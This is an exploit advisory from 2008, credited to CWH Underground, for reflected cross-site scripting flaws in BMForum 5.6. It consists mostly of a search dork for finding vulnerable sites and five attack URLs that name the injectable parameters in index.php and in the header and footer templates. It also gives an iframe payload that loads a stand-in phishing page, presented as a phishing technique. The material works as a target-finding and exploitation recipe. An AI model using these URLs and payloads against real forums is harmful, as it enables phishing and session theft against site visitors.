BMForum Remote 5.6 Miltiple XSS Vulnerability

==========================================================

BMForum Remote 5.6 Miltiple XSS Vulnerability

==========================================================

AUTHOR : CWH Underground

DATE   : 22 May 2008

SITE   : www.citec.us

#####################################################

APPLICATION : BMForum

VERSION     : 5.6 (Lastest Version)

VENDOR      : http://downloads.sourceforge.net/bmforum

#####################################################

DORK: "powered by BMForum"

---Exploit---

[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>

[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copy
right=<XSS>

[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandprona
me=<XSS>

[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS
>

[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<X
SS>

--- Note ---

Very Dangerous for using 'IFRAME' TAG for Phishing Techniques

Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME src=http://phisherpage.com width="900" height="600">

.

##################################################################

# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #

##################################################################